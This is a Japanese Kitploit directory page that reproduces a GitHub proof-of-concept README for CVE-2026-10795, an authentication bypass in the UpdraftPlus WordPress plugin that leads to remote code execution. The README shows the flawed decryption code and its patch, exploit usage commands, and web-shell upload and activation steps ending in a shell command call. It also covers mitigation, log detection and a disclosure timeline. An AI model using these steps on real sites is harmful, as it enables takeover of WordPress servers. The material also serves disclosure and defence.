Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-10795 — CVE-2026-10795 – UpdraftPlus 認証バイパス | Kitploit
ツール/GitHubGitHub/izxci/cve-2026-10795
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus 認証バイパス

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus 認証バイパス

CVE-2026-10795 – UpdraftPlus 認証バイパス PoC

⚠️ 免責事項: このリポジトリは教育目的のみです。
自分が所有するシステム、または明示的なテスト許可があるシステムでのみ使用してください。
著者は誤用に対する一切の責任を負いません。


📋 概要

フィールド詳細
プラグインUpdraftPlus: WP Backup & Migration
影響を受けるバージョン≤ 1.26.4
修正バージョン1.26.5
CVSS スコア8.1 (高)
脆弱性タイプ認証されていない認証バイパス → RCE
発見者vtim (Wordfence バグ報奨金)
報奨金$5,200

🔍 脆弱性の概要

UpdraftPlus は、UpdraftCentral に接続されたサイトのページ読み込みごとに、認証されていない RPC リスナー を登録します。

decrypt_message() 関数は $rsa->decrypt() の戻り値を検証しません。
RSA 復号が失敗すると、false が Rijndael::setKey() に渡され、決定論的な全ゼロの AES-128 キー に縮退します。

攻撃者は可能:

  1. ゼロキーで暗号化された udrpc_message を偽造する
  2. サーバーにそれを正常に復号させる
  3. 接続された管理者として任意の RPC コマンドを実行する
  4. 悪意のあるプラグインをアップロードして有効化 → リモートコード実行 (RCE)

🧬 脆弱なコード

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Lines 460-491 (version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ No return value check!

$rij->setKey($sym_key);  // false → all-zero key
return $rij->decrypt($ciphertext);

✅ 修正済みコード

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Added in 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 リポジトリ構造

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # メインのエクスプロイトスクリプト
├── requirements.txt        # Python 依存関係
├── payloads/
│   ├── list_plugins.py     # インストール済みプラグインの一覧表示
│   ├── upload_shell.py     # ウェブシェルプラグインのアップロード
│   └── activate_plugin.py  # アップロードしたプラグインの有効化
├── shell/
│   ├── build_shell.py      # ウェブシェル ZIP の作成
│   └── test-shell.php      # 最小限の PHP ウェブシェル
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ インストール

root@kitploit:~
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 テスト環境のセットアップ

1. XAMPP のインストール

root@kitploit:~
https://www.apachefriends.org
起動: Apache + MySQL

2. WordPress + UpdraftPlus 1.26.4 のインストール

root@kitploit:~
# Place WordPress in htdocs
C:/xampp/htdocs/wordpress/

# Install vulnerable plugin version
# Download: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. UpdraftCentral への接続

root@kitploit:~
WordPress 管理画面 → 設定 → UpdraftPlus → UpdraftCentral タブ → 接続

⚠️ 必須: 脆弱性を悪用可能にするには、サイトが UpdraftCentral に接続されている必要があります。


🚀 使用方法

基本的な使い方

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

プラグインの一覧表示

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

ウェブシェルのアップロード

root@kitploit:~
# Step 1: Build the shell ZIP
python shell/build_shell.py

# Step 2: Upload
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Step 3: Activate
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Step 4: Test RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 動作の仕組み

root@kitploit:~
poc.py
  │
  ├─ 1. 不正な RSA 暗号化 sym_key(ガベージバイト)を生成
  │
  ├─ 2. RPC ペイロードを ZERO AES-128 キー (0x00 * 16) で暗号化
  │
  ├─ 3. udrpc_message を構築:
  │       [3-byte hex len][fake_sym_key][16-byte hex cipherlen][ciphertext]
  │
  ├─ 4. ターゲットに POST(認証、ノンス、cookie 不要)
  │
  └─ 5. サーバー側:
          rsa->decrypt(garbage) → false
          setKey(false)         → 0x00 key
          decrypt(ciphertext)   → 私たちのペイロード ✅
          wp_set_current_user() → 管理者アクセス
          RPC コマンドが実行  → RCE 💀

🛡️ 検出と緩和策

緩和策

root@kitploit:~
Update UpdraftPlus to version 1.26.5 immediately.

検出(ログ分析)

root@kitploit:~
# Look for suspicious POST requests with udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence users are protected since June 3, 2026

侵害指標

root@kitploit:~
- 予期しないプラグインのインストール
- New PHP files in wp-content/plugins/
- udrpc_message パラメータを含む WordPress ルートへの POST リクエスト
- WordPress ログでの予期しない管理者レベルのアクション

📅 開示スケジュール

日付イベント
2026年6月1日Wordfence バグ報奨金プログラムを通じて脆弱性を提出
2026年6月3日検証されベンダーに開示
2026年6月3日Wordfence Premium ファイアウォールルールが展開
2026年6月4日ベンダーが確認
2026年6月5日パッチリリース (v1.26.5)
2026年7月3日Wordfence Free 保護が有効

📚 参考文献

  • Wordfence Advisory
  • UpdraftPlus プラグインページ
  • phpseclib RSA ドキュメント
  • プラグインの変更ログ

👤 クレジット

  • 最初の発見: vtim (Wordfence バグ報奨金プログラム)
  • PoC 作成者: izxci
  • 目的: 教育 / セキュリティ研究

📜 ライセンス

root@kitploit:~
MIT License – For educational use only.
Unauthorized use against systems you don't own is illegal.
ツールをダウンロード